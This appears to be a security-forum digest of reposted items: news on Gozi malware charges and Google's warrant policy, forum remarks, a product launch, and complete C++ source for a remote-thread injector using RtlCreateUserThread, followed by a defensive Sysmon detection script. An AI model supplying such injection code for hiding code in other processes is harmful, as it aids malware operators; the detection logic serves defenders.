  18. 3 Men Suspected of Developing and Distributing Gozi Malware Charged January 24th, 2013, 08:20 GMT · By Eduard Kovacs Three individuals, suspected of developing and distributing the notorious Gozi malware, have been charged in a Manhattan federal court. According to the US Department of Justice, the Gozi malware has infected more than one million computers, causing losses totaling tens of millions of dollars. The suspects are Nikita Kuzmin, a Russian national who is believed to have created the malware, Deniss Calovskis, a Latvian who contributed to Gozi’s development, and Romanian Mihai Ionut Paunescu who ran the “bulletproof” hosting service used to distribute the malicious element. Kuzmin, aged 25, was arrested back in November 2010 and already pled guilty to computer intrusion and fraud charges in May 2011. 27-year-old Calovskis was arrested in Latvia in November 2012 and 25-year-old Paunescu was arrested last month in Romania. Court documents reveal that Kuzmin created a list of technical specifications for Gozi back in 2005. He then hired a computer programmer, “CC-1,” to write its source code. Once the malware had been developed, Kuzmin started selling it to his co-conspirators. He contracted Calovskis and others to improve the malicious creation. Authorities believe that Calovskis wrote the code for the web injects. The bulletproof hosting services offered by Paunescu were used not only for the distribution of the Gozi malware, but also for other cybercrimes, such as spam, distributed denial-of-service (DDOS) attacks, and the distribution of other Trojans such as ZeuS and SpyEye. “This long-term investigation uncovered an alleged international cybercrime ring whose far-reaching schemes infected at least one million computers worldwide and 40,000 in the U.S., and resulted in the theft or loss of tens of millions of dollars,” said FBI Assistant Director-in-Charge George Venizelos. 
“Banking Trojans are to cyber criminals what safe-cracking or acetylene torches are to traditional bank burglars – but far more effective and less detectable. The investigation put an end to the Gozi virus.” If found guilty, Kuzmin faces a maximum penalty of 95 years in prison. Calovskis and Paunescu face 67 and 60 years in prison, respectively. Source: 3 Men Suspected of Developing and Distributing Gozi Malware Charged - Softpedia
19. [h=1]Defrag: Moving Page File, Recovering Encrypted Files, Missing User Account[/h] Posted: Nov 24, 2011 at 10:14 AM By: Larry Larsen Microsoft tech troubleshooter extraordinaire Gov Maharaj and I help walk you through troubleshooting solutions to your tech support problems. If you have a problem you want to send us, you can use the Problem Step Recorder in Windows 7 (see this for details on how) and send us the zip file to DefragShow@microsoft.com. We will also be checking comments for problems, but the email address will let us contact you if needed. [01:15] - OEM media for OS reinstall. [02:22] - How to move the page file from one drive to another. [05:59] - Is there a way to recover encrypted files if you have access to the physical drive? [10:51] - ICS not working on home configuration. [13:59] - Troubleshooting screen reinitializing on machine. [16:48] - Can't see a user account made on a PC. [18:54] - Floppy drive A: started showing up, how to remove. [20:22] - Calc button on keyboard no longer starts up multiple instances. [22:03] - Pick of the Week: StevieB talking about the Applied Sciences Group (Hard Rock Cafe). Video: http://channel9.msdn.com/Shows/The-Defrag-Show/Defrag
  20. Google Tells Cops to Get Warrants for User E-Mail, Cloud Data By David Kravets 01.23.13 5:29 PM Google demands probable-cause, court-issued warrants to divulge the contents of Gmail and other cloud-stored documents to authorities in the United States — a startling revelation Wednesday that runs counter to federal law that does not always demand warrants. The development surfaced as Google publicly announced that more than two-thirds of the user data Google forwards to government agencies across the United States is handed over without a probable-cause warrant. A Google spokesman told Wired that the media giant demands that government agencies — from the locals to the feds — get a probable-cause warrant for content on its e-mail, Google Drive cloud storage and other platforms — despite the Electronic Communications Privacy Act allowing the government to access such customer data without a warrant if it’s stored on Google’s servers for more than 180 days. “Google requires an ECPA search warrant for contents of Gmail and other services based on the Fourth Amendment to the Constitution, which prevents unreasonable search and seizure,” Chris Gaither, a Google spokesman, said. Some of the customer data doled out without a warrant include names listed when creating Gmail accounts, the IP address from where the account was created, and where and what time a user signs in and out of an account. What’s more, Google hands over without warrants the IP address associated with a particular e-mail sent from a Gmail account or used to change the account password, in addition to the non-content portion of e-mail headers such as the “from,” “to” and “date” fields. It was not immediately known whether other ISPs are traveling Google’s path when it comes to demanding probable-cause warrants for all stored content. 
But Google can seemingly grant more privacy than the four corners of the law allows because there’s been a string of conflicting court opinions on whether warrants are required for data stored on third-party servers longer than 180 days. The Supreme Court has never weighed in on the topic — and the authorities are seemingly abiding by Google’s rules to avoid a high court showdown. The Electronic Communications Privacy Act of 1986, the relevant law in question, was adopted at a time when e-mail wasn’t stored on servers for a long time, but instead was held there briefly on its way to the recipient’s inbox. In the 1980s, e-mail more than 6 months old was assumed abandoned, and therefore ripe for the taking without a probable-cause warrant. That law is still on the books today, even as the advancement of technology has undermined its original theory. But clearly, changing the law to comport with Google’s interpretation has been met with unreceptive members of Congress. The Senate Judiciary Committee approved a measure last year mirroring Google’s interpretation, but the bill died a quiet death. Moves to change the law have been scuttled over and again. Google’s Transparency Report issued January 23, 2013. For now, under the letter of the ECPA law, the government only needs to show that it has “reasonable grounds to believe” e-mail and other documents stored in the cloud for more than 180 days would be useful to an investigation. Gaither, the Google spokesman, did not know when Google began demanding warrants. But there were two federal appellate decisions on the topic rendered in 2010, one requiring a warrant for content and another saying federal judges had the discretion to demand one. Meantime, Google released Wednesday its so-called “Transparency Report” shedding light on government requests for data. Globally, the United States again ranked No. 1 in terms of demands for Google customer data.
India, France, Germany, the United Kingdom and Brazil were trailing in that order. The figures for the first time provide a brief outline on whether data was handed over with or without a court warrant — a praiseworthy move we’ve been agitating for at Threat Level following the report’s inception. Google first began releasing its Transparency Report in 2009. Google offers e-mail, cloud storage, a blogging platform, a phone and texting platform, web search and other services. The data Google is coughing up to the authorities includes e-mail and text-messaging communications, cloud-stored documents and, among other things, browsing activity, and even IP addresses used to create an account. In all, agencies across the United States demanded 8,438 times that Google fork over data on some 14,791 accounts for the six-month period ending December 2012. Probable-cause search warrants were issued in 1,896 of the cases. Subpoenas, which require the government to assert that the data is relevant to an investigation, were issued 5,784 times. Google could not quantify the remaining 758. Google’s transparency data is limited as it does not include requests under the Patriot Act, which can include National Security Letters with gag orders attached. Nor do the data include anti-terrorism eavesdropping court orders known as FISA orders or any dragnet surveillance programs legalized in 2008, as those are secret, too. In all those instances, probable-cause warrants generally are not required, even for customer content stored in Google’s servers. Sursa: http://www.wired.com/threatlevel/2013/01/google-says-get-a-warrant/
21. Discussions specific to operating systems, Linux included, can be held in the "Operating Systems" category. "Linux" tutorials can be written in the Tutorials categories, in Romanian, in English or as video. The term "security" is far too broad and at the same time says nothing concrete. By "hack", honestly, I don't understand what you mean. Many things could fall under it, from tricky shell scripting commands to exploit development (writing local privilege escalation exploits). For Tools, as you said yourself, there are also 3 dedicated categories. The main problem is that not many discussions strictly about the Linux operating system take place. In other words, Linux gets talked about fairly little around here. Besides, I'd like us to avoid creating a category in which, I could swear, 90% of the discussions would be about Shitubuntu and would be problems run into by users of that "colorful" Linux distribution; more precisely, we would stray from the forum's theme, IT security, and cover what specialized forums already cover.
22. No. RST is a community in which members help each other. More precisely, some help others, while others, like you, come here only for their personal needs, in this case to buy/sell something. This is where the posts come in, and also what goes by the name of "socializing". You would rather buy from someone who has helped you x times than from someone you know nothing about. From posts you can tell both a person's technical knowledge and the way they think. More precisely, if you see sum1 hu rites lyk dis you can be certain they are not a suitable person to work with.
23. [h=1]Another example usage of RtlCreateUserThread[/h][h=3]Author: zwclose7[/h]This program creates a remote thread within another process using the RtlCreateUserThread function. Instead of using GetProcAddress to get the function address, it imports the function from ntdll.dll directly. Download: http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3784

#include <iostream>
#include <string>
#include <Windows.h>
using namespace std;

// RtlCreateUserThread and NtResumeThread are undocumented ntdll exports. They
// are linked directly (no GetProcAddress), which requires ntdll.lib from the
// Windows SDK/WDK. The usual reason to prefer RtlCreateUserThread over
// CreateRemoteThread: it bypasses the Win32 layer's CSRSS notification, so it
// also works across sessions (e.g. from a service into an interactive user's
// process, where CreateRemoteThread fails with ERROR_ACCESS_DENIED).
#pragma comment(lib, "ntdll.lib")

typedef struct _CLIENT_ID {
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

EXTERN_C LONG WINAPI RtlCreateUserThread(
    HANDLE ProcessHandle, PSECURITY_DESCRIPTOR SecurityDescriptor,
    BOOLEAN CreateSuspended, ULONG StackZeroBits,
    PULONG StackReserve, PULONG StackCommit,   // PSIZE_T in the real prototype; NULL is passed here
    PVOID StartAddress, PVOID Parameter,
    PHANDLE ThreadHandle, PCLIENT_ID ClientId);
EXTERN_C LONG WINAPI NtResumeThread(HANDLE ThreadHandle, PULONG SuspendCount);

// NT_SUCCESS lives in ntdef.h, which Windows.h does not include.
#define NT_OK(status) (((LONG)(status)) >= 0)

// SeDebugPrivilege lets us open processes owned by other users; failure is
// not fatal for a process the caller already owns.
static void EnableDebugPrivilege() {
    HANDLE hToken;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return;
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    CloseHandle(hToken);
}

int main() {
    HANDLE hThread;
    CLIENT_ID cid;
    DWORD PID, exts;
    PVOID para;
    string dll, func;

    EnableDebugPrivilege();

    cout << "==========Remote Thread Creator==========\n\n";
    cout << "This program creates a remote thread within another process using\nRtlCreateUserThread. Instead of using\n";
    cout << "GetProcAddress to get the function address, it imports the function\n";
    cout << "from ntdll.dll directly.\n\n";
    cout << "Enter PID:";
    cin >> PID;
    cout << "Enter DLL name:";
    cin >> dll;              // std::string: no fixed 60-byte buffer to overrun
    cout << "Enter function name:";
    cin >> func;
    cout << "Enter parameter (hex):";
    cin >> para;             // istream reads a void* as a hexadecimal address

    // The address is resolved in THIS process and is only valid in the target
    // if the DLL is mapped there at the same base. That holds for ntdll and
    // kernel32 within one boot session; for anything else the target's module
    // list has to be walked instead.
    HMODULE hModule = GetModuleHandleA(dll.c_str());
    PVOID start = hModule ? (PVOID)GetProcAddress(hModule, func.c_str()) : NULL;
    if (start == NULL) {
        cout << "\nUnable to resolve " << dll << "!" << func << " in this process.\n";
        return 1;
    }

    // The same minimum rights CreateRemoteThread needs; RtlCreateUserThread
    // also allocates the new thread's stack inside the target.
    HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                                  PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                                  FALSE, PID);
    if (hProcess == NULL) {
        cout << "\nUnable to open process handle.\n";
        return 1;
    }

    LONG status = RtlCreateUserThread(hProcess, NULL, TRUE, 0, NULL, NULL,
                                      start, para, &hThread, &cid);
    if (!NT_OK(status)) {
        cout << "\nRtlCreateUserThread failed, NTSTATUS 0x" << hex << status << dec << "\n";
        CloseHandle(hProcess);
        return 1;
    }

    cout << "Thread created in suspended state (TID " << (DWORD)(DWORD_PTR)cid.UniqueThread
         << "). Press any key to resume it.\n\n";
    system("pause");
    NtResumeThread(hThread, NULL);

    WaitForSingleObject(hThread, INFINITE);
    GetExitCodeThread(hThread, &exts);
    cout << "\n\nThread terminated with status code: " << exts;
    CloseHandle(hThread);
    CloseHandle(hProcess);
    return 0;
}

Source: Another example usage of RtlCreateUserThread - rohitab.com - Forums
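Both injectors reposted above (item 11's codecave started with CreateRemoteThread and item 23's RtlCreateUserThread call) look the same from the defender's side: a thread appears in the target that the target never created. Sysmon logs such cross-process thread creations as Event ID 8, resolving the new thread's StartAddress to a StartModule and StartFunction where it can. The script below is an added example written for this page, not code from either post, from rohitab.com or from Sysmon; it applies the two tells a defender would check to constructed Event 8 records: a start address that no loaded module backs (the codecave case) and a start at a DLL-loader routine (classic DLL injection). The flattened Key=Value record format, the sample values and the csrss.exe allow-list are assumptions for the example; real Sysmon events are XML and allow-lists have to be tuned per environment.

```python
"""Flag suspicious cross-process thread creations in Sysmon Event ID 8 records.

Added example for this page, not code from the forum posts above. The records
are constructed by hand in a flattened 'Key=Value; Key=Value' form so the
script runs offline; real Sysmon events are XML.
"""

# Thread entry points that mean "load this DLL": the injector passes a DLL path
# as the thread parameter. Starting a remote thread here is the DLL-injection tell.
LOADER_ENTRYPOINTS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA",
                      "LoadLibraryExW", "LdrLoadDll"}

# Source images that legitimately create threads in other processes.
# Assumption for the example (csrss does so for console control); tune per host.
KNOWN_INJECTORS = {r"c:\windows\system32\csrss.exe"}


def parse_event8(line):
    """Turn 'Key=Value; Key=Value' into a dict; empty values stay ''."""
    fields = {}
    for part in line.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def classify(ev):
    """Return the reasons a record looks like code injection (empty = benign)."""
    reasons = []
    if ev.get("SourceImage", "").lower() in KNOWN_INJECTORS:
        return reasons
    if ev.get("SourceProcessId") == ev.get("TargetProcessId"):
        return reasons  # defensive: same process means no remote thread
    if not ev.get("StartModule"):
        # Start address inside memory no module backs: shellcode/codecave,
        # exactly what item 11's injector produces with VirtualAllocEx + WPM.
        reasons.append("thread start address is not inside a loaded module")
    if ev.get("StartFunction") in LOADER_ENTRYPOINTS:
        reasons.append("thread starts at a DLL loader routine (DLL injection)")
    return reasons


def scan(lines):
    """Return (TargetImage, NewThreadId, reasons) for every suspicious record."""
    hits = []
    for line in lines:
        ev = parse_event8(line)
        reasons = classify(ev)
        if reasons:
            hits.append((ev.get("TargetImage"), ev.get("NewThreadId"), reasons))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    # codecave: start address in private memory, no backing module
    "SourceProcessId=4120; SourceImage=C:\\Users\\lab\\injector.exe; "
    "TargetProcessId=2288; TargetImage=C:\\Windows\\System32\\notepad.exe; "
    "NewThreadId=5108; StartAddress=0x00340000; StartModule=; StartFunction=",
    # DLL injection: remote thread started at kernel32!LoadLibraryA
    "SourceProcessId=4120; SourceImage=C:\\Users\\lab\\injector.exe; "
    "TargetProcessId=2288; TargetImage=C:\\Windows\\System32\\notepad.exe; "
    "NewThreadId=5112; StartAddress=0x76E3E5B0; "
    "StartModule=C:\\Windows\\System32\\kernel32.dll; StartFunction=LoadLibraryA",
    # same process creating its own thread: benign
    "SourceProcessId=2288; SourceImage=C:\\Windows\\System32\\notepad.exe; "
    "TargetProcessId=2288; TargetImage=C:\\Windows\\System32\\notepad.exe; "
    "NewThreadId=5120; StartAddress=0x76E3F120; "
    "StartModule=C:\\Windows\\System32\\kernel32.dll; StartFunction=BaseThreadInitThunk",
    # allow-listed system source: benign
    "SourceProcessId=612; SourceImage=C:\\Windows\\System32\\csrss.exe; "
    "TargetProcessId=2288; TargetImage=C:\\Windows\\System32\\notepad.exe; "
    "NewThreadId=5124; StartAddress=0x77A10000; "
    "StartModule=C:\\Windows\\System32\\ntdll.dll; StartFunction=RtlUserThreadStart",
]

if __name__ == "__main__":
    for target, tid, reasons in scan(SAMPLE_EVENTS):
        print(f"{target} tid={tid}: " + "; ".join(reasons))
```

The "no StartModule" check is the higher-confidence one: legitimate software almost never starts a remote thread in memory no image backs. The loader-routine check fires on benign tooling too (debuggers, accessibility software), which is why an allow-list on SourceImage is needed before paging anyone.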
24. [h=1]Bitdefender launches the free PC scanning application 60-Second Virus Scanner[/h] BUCHAREST, 23 January 2013 – Bitdefender, the leader of the local antivirus market, launches the free application 60-Second Virus Scanner, which gives any user additional protection through a cloud-based technology that reports all active threats. Bitdefender 60-Second Virus Scanner gives all PC users the assurance that their system is checked by a proactive scanning technology that is available free of charge at any time. Bitdefender's technology has consistently ranked first in detection tests run by the independent antivirus testing institutes AV-Test and AV-Comparatives. "With 60-Second Virus Scanner we aim to bring our top technology to as many computers as possible. We are convinced it will impress PC users through its efficiency and unobtrusive operation. We expect the free application to be used by many of those who already run an antivirus but want to find out whether their solution blocks all threats," said Cătălin Coșoi, Chief Security Strategist, Bitdefender. The application works alongside any other antivirus program, letting users check whether their security software is doing its job. 60-Second Virus Scanner works unobtrusively, protects the system while users work or play, and sends real-time alerts as it detects viruses. The cloud-based technology has no impact on the system in terms of resource consumption. Download: http://download.bitdefender.com/npd/60Second/60Second_ro_ro.exe Source: Bitdefender lanseaza aplicatia gratuita de scanare a PC-urilor 60-Second Virus Scanner
25. There were 100,000 posts.